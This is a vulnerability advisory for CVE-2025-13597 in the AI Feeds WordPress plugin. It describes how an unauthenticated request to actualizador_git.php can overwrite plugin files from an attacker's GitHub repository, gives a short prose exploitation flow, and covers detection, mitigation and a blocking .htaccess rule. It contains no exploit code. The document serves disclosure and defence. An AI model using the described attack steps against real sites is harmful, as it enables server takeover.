CVE-2025-13597 Overview
The AI Feeds plugin for WordPress contains a critical arbitrary file upload vulnerability due to a missing capability check in the actualizador_git.php file. This vulnerability affects all versions up to and including 1.0.11, allowing unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files on the affected site's server, potentially leading to remote code execution.
Critical Impact
Unauthenticated attackers can achieve remote code execution by exploiting this arbitrary file upload vulnerability to overwrite server-side plugin files with malicious content from attacker-controlled GitHub repositories.
Affected Products
- WordPress AI Feeds plugin versions up to and including 1.0.11
- WordPress installations with the vulnerable AI Feeds plugin installed
- Web servers hosting affected WordPress sites
Discovery Timeline
- 2025-11-25 - CVE-2025-13597 published to NVD
- 2025-12-01 - Last updated in NVD database
Technical Details for CVE-2025-13597
Vulnerability Analysis
This vulnerability is classified as CWE-434 (Unrestricted Upload of File with Dangerous Type). The root issue stems from the actualizador_git.php file lacking proper authentication and authorization checks before executing its functionality. The file allows external requests to trigger GitHub repository downloads and subsequently overwrite existing plugin files on the WordPress server.
The attack can be executed remotely over the network without requiring any authentication or user interaction. When exploited successfully, attackers gain the ability to compromise the confidentiality, integrity, and availability of the affected system by injecting malicious code that executes with the privileges of the web server.
Root Cause
The vulnerability exists because the actualizador_git.php file does not implement capability checks to verify whether the requesting user has appropriate permissions to perform file operations. Without these authorization controls, any unauthenticated user can invoke the functionality exposed by this file, bypassing WordPress's built-in permission system entirely.
Attack Vector
The attack is network-based and requires no authentication or user interaction. An attacker can craft requests to the vulnerable actualizador_git.php endpoint, specifying a malicious GitHub repository URL. The plugin then downloads the contents of this repository and overwrites files within the plugin directory structure. By hosting a specially crafted repository containing malicious PHP files, an attacker can achieve arbitrary code execution on the target WordPress server.
The exploitation flow involves:
- Identifying a WordPress site with the vulnerable AI Feeds plugin installed
- Sending a crafted request to the actualizador_git.php endpoint with a malicious GitHub repository URL
- The plugin downloads and extracts the repository contents, overwriting existing plugin files
- The attacker then triggers execution of the malicious PHP code by accessing the overwritten files
For detailed technical analysis, refer to the Ryan Kozak Analysis and the GitHub PoC Repository.
Detection Methods for CVE-2025-13597
Indicators of Compromise
- Unexpected HTTP requests to /wp-content/plugins/ai-feeds/actualizador_git.php from external sources
- Modified plugin files within the AI Feeds plugin directory with recent timestamps
- Web server logs showing requests containing GitHub repository URLs targeting the vulnerable endpoint
- Presence of unknown PHP files or modified existing files in the ai-feeds plugin directory
Detection Strategies
- Monitor web server access logs for requests to actualizador_git.php with suspicious parameters
- Implement file integrity monitoring on the WordPress wp-content/plugins/ directory to detect unauthorized modifications
- Deploy Web Application Firewall (WAF) rules to block unauthenticated requests to the vulnerable endpoint
- Review WordPress plugin directories for files with unexpected modification dates or unknown origins
Monitoring Recommendations
- Enable detailed logging for the WordPress installation and web server
- Configure alerts for any file changes within plugin directories
- Monitor outbound network connections from the web server to GitHub that may indicate exploitation attempts
- Implement real-time threat detection solutions to identify post-exploitation activity
How to Mitigate CVE-2025-13597
Immediate Actions Required
- Update the AI Feeds plugin to a version newer than 1.0.11 immediately
- If an update is not available, deactivate and remove the AI Feeds plugin until a patch is released
- Audit all files in the wp-content/plugins/ai-feeds/ directory for unauthorized modifications
- Review server logs for evidence of prior exploitation attempts
- Consider restoring plugin files from a known-good backup if tampering is suspected
Patch Information
A security patch addressing this vulnerability is tracked in the WordPress Change Review. Administrators should update to the patched version as soon as it becomes available through the WordPress plugin repository. Additional details can be found in the Wordfence Vulnerability Report.
Workarounds
- Remove or rename the actualizador_git.php file to prevent exploitation (note: this may break plugin functionality)
- Implement server-level access controls to restrict access to the vulnerable file
- Use .htaccess rules to block direct access to the actualizador_git.php file from external requests
- Deploy a Web Application Firewall with rules to block requests containing GitHub repository URLs to the plugin directory
# Apache .htaccess workaround to block access to vulnerable file
<Files "actualizador_git.php">
Order Allow,Deny
Deny from all
</Files>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
